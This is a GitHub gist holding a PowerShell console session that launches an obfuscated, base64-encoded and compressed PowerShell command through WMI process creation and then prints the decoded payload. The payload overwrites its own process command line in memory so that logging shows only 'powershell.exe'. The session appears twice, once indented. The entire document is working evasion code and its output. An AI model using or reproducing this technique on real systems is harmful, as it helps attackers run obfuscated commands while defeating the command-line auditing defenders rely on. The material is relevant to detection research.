leechristensen/gist:e83265c78d5eb8b356dc2ece2ccf493f

## gistfile1.txt
PS C:\> $Command = 'powershell.exe  -E "cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAagBWAEQATgBhAHQAdABBAEUATAA0AGIALwBBADYARABFAEcAUgBGAHIAUwBWAE4ANgBNAFgARgBoADkAWgB1ADAAMABBAGMAVABLADIAMgBCACsASABEAFcAcABwAFkAUwAxAGMANwBZAG4AZgBVADEASQBTACsAZQAwAGUAVwAwADAAQgBQAHUAVwBqAEYAegBIAHkALwBLAFIAOAA3AGgAQQBWADgAcQBPAHUAOABHAEgANwB6AE4AYgBaADcARABDAHQAOABzAE4ANgB5AEoAUQA4AFgANQBjAHEANQAyADcAYQBqAHcAQwByADUAaQBjAEcAagB1ADcANwBTAHQAWABQAEoAYgBOAG0AWQBzAEUAVgBlAG4ARgAvADkAegBkAHUASwBhAHMAeAAyAFgAYgA5ADMAdABvAEwASQBoAHUAWABCADMAeQB3AHcAdQBQAFcAOAA0AFEAQQAzAHkARQB0AHEAVwArAFAAcgBPACsAdABSAFoAZQA4AHYASQBOACsAWQBHAEkAcwBtADkASgBEAGYAbQB4AGIAaABoAC8AWABYAFYAOQBOAEoATwBwAHcAdgBJAEIAMAA4AHoAdQBmAC8ANAAyAFMALwBQAGUAMwBMAHIANwAxAG4AMgA2AEkAVwBBAFEAegBVAGIAVABIADgAcwBoAFYARwB2AFQAWQBoAE4AcwBiAHQANQBuAE0AaABLAGsAaQB1AHIAVAArAEkAUgB6AFUAUQBEAC8AaAA3AGYAUAB4AHUAbgBGAEEAawBxAFYATABsADkAaABnAFoAVwA3ADIAeQA1AHUAQQBwAGkAdgBHAG8ATgA0AEcARQBLAE8ANQBHADkAVAA0AEUAbABBAHoAagBUAEcAVwBaAEMARgBpAC8AcAByAHAAMwBxAEQAOQBiAGgANABQADMATABGAFYAbABKAFgAWABzAEwAcgBOAGsATwByAEUAUABTAGcAMAB1ADkAUgAzADYAQQB6AGQAdgAzAG0AYQBRAE8ANABhAHoAOABIAG0AYQB3AGQATgAwAHcAawAyAGcAUgAwAGgAawBBAGQAVwBZAEUAcAB6AEUAQgBCAHUAQgBpAGMAQwBSAFAAdwBqAGYASAB6AEgAOQA4AGMAZwBZAHgAYgBNAHEAQwB5AGwAVwBmAC8ASgBTAHUAZQBRAFMAagA4AC8AMQBhAHoARgA3AHUAbABKAG4AbwBaAGUAcwBtADkAYwAyAE4AcABaAFYAMABKAGMAYgBSADMAdgBqAFQAcQAzADkASQAzAHMARgBmAGsAbgBkAFUAWQAxAGUAWgAzAEEANQBnADYARgB5ACsAWgA0AEcAZQBrAG0AQwBGADUANwBvAEUARAB0ADQATgA1ADMAOABCAFEAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA="'
PS C:\> $Ret = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList @($Command)
PS C:\> Sleep 2
PS C:\> $NewProc = Get-WmiObject -Class Win32_Process -Filter "ProcessId=$($Ret.ProcessId)"
PS C:\> $NewProc.CommandLine
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


*** Encoded Command ***
$type = Add-Type -MemberDefinition '[DllImport("kernel32.dll",CharSet=CharSet.Unicode)]public static extern IntPtr GetCommandLine();' -PassThru -Name Win32

$Ptr = $type::GetCommandLine()
$Str = [Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)

$NewVal = "$(([System.Diagnostics.Process]::GetCurrentProcess()).MainModule.FileName)$([char]0)"

if(($Str.Length+1) -lt $NewVal.Length) {
    throw "New command line is too long"
}

$Bytes = ([Text.Encoding]::Unicode).GetBytes($NewVal)
$NewValPtr = [Runtime.InteropServices.Marshal]::StringToHGlobalUni($NewVal)
[Runtime.InteropServices.Marshal]::Copy($Bytes, 0, $Ptr, $Bytes.Count)
sleep 5
	PS C:\> $Command = 'powershell.exe -E "cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAagBWAEQATgBhAHQAdABBAEUATAA0AGIALwBBADYARABFAEcAUgBGAHIAUwBWAE4ANgBNAFgARgBoADkAWgB1ADAAMABBAGMAVABLADIAMgBCACsASABEAFcAcABwAFkAUwAxAGMANwBZAG4AZgBVADEASQBTACsAZQAwAGUAVwAwADAAQgBQAHUAVwBqAEYAegBIAHkALwBLAFIAOAA3AGgAQQBWADgAcQBPAHUAOABHAEgANwB6AE4AYgBaADcARABDAHQAOABzAE4ANgB5AEoAUQA4AFgANQBjAHEANQAyADcAYQBqAHcAQwByADUAaQBjAEcAagB1ADcANwBTAHQAWABQAEoAYgBOAG0AWQBzAEUAVgBlAG4ARgAvADkAegBkAHUASwBhAHMAeAAyAFgAYgA5ADMAdABvAEwASQBoAHUAWABCADMAeQB3AHcAdQBQAFcAOAA0AFEAQQAzAHkARQB0AHEAVwArAFAAcgBPACsAdABSAFoAZQA4AHYASQBOACsAWQBHAEkAcwBtADkASgBEAGYAbQB4AGIAaABoAC8AWABYAFYAOQBOAEoATwBwAHcAdgBJAEIAMAA4AHoAdQBmAC8ANAAyAFMALwBQAGUAMwBMAHIANwAxAG4AMgA2AEkAVwBBAFEAegBVAGIAVABIADgAcwBoAFYARwB2AFQAWQBoAE4AcwBiAHQANQBuAE0AaABLAGsAaQB1AHIAVAArAEkAUgB6AFUAUQBEAC8AaAA3AGYAUAB4AHUAbgBGAEEAawBxAFYATABsADkAaABnAFoAVwA3ADIAeQA1AHUAQQBwAGkAdgBHAG8ATgA0AEcARQBLAE8ANQBHADkAVAA0AEUAbABBAHoAagBUAEcAVwBaAEMARgBpAC8AcAByAHAAMwBxAEQAOQBiAGgANABQADMATABGAFYAbABKAFgAWABzAEwAcgBOAGsATwByAEUAUABTAGcAMAB1ADkAUgAzADYAQQB6AGQAdgAzAG0AYQBRAE8ANABhAHoAOABIAG0AYQB3AGQATgAwAHcAawAyAGcAUgAwAGgAawBBAGQAVwBZAEUAcAB6AEUAQgBCAHUAQgBpAGMAQwBSAFAAdwBqAGYASAB6AEgAOQA4AGMAZwBZAHgAYgBNAHEAQwB5AGwAVwBmAC8ASgBTAHUAZQBRAFMAagA4AC8AMQBhAHoARgA3AHUAbABKAG4AbwBaAGUAcwBtADkAYwAyAE4AcABaAFYAMABKAGMAYgBSADMAdgBqAFQAcQAzADkASQAzAHMARgBmAGsAbgBkAFUAWQAxAGUAWgAzAEEANQBnADYARgB5ACsAWgA0AEcAZQBrAG0AQwBGADUANwBvAEUARAB0ADQATgA1ADMAOABCAFEAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA="'
	PS C:\> $Ret = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList @($Command)
	PS C:\> Sleep 2
	PS C:\> $NewProc = Get-WmiObject -Class Win32_Process -Filter "ProcessId=$($Ret.ProcessId)"
	PS C:\> $NewProc.CommandLine
	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe



	* Encoded Command *
	$type = Add-Type -MemberDefinition '[DllImport("kernel32.dll",CharSet=CharSet.Unicode)]public static extern IntPtr GetCommandLine();' -PassThru -Name Win32

	$Ptr = $type::GetCommandLine()
	$Str = [Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)

	$NewVal = "$(([System.Diagnostics.Process]::GetCurrentProcess()).MainModule.FileName)$([char]0)"

	if(($Str.Length+1) -lt $NewVal.Length) {
	throw "New command line is too long"
	}

	$Bytes = ([Text.Encoding]::Unicode).GetBytes($NewVal)
	$NewValPtr = [Runtime.InteropServices.Marshal]::StringToHGlobalUni($NewVal)
	[Runtime.InteropServices.Marshal]::Copy($Bytes, 0, $Ptr, $Bytes.Count)
	sleep 5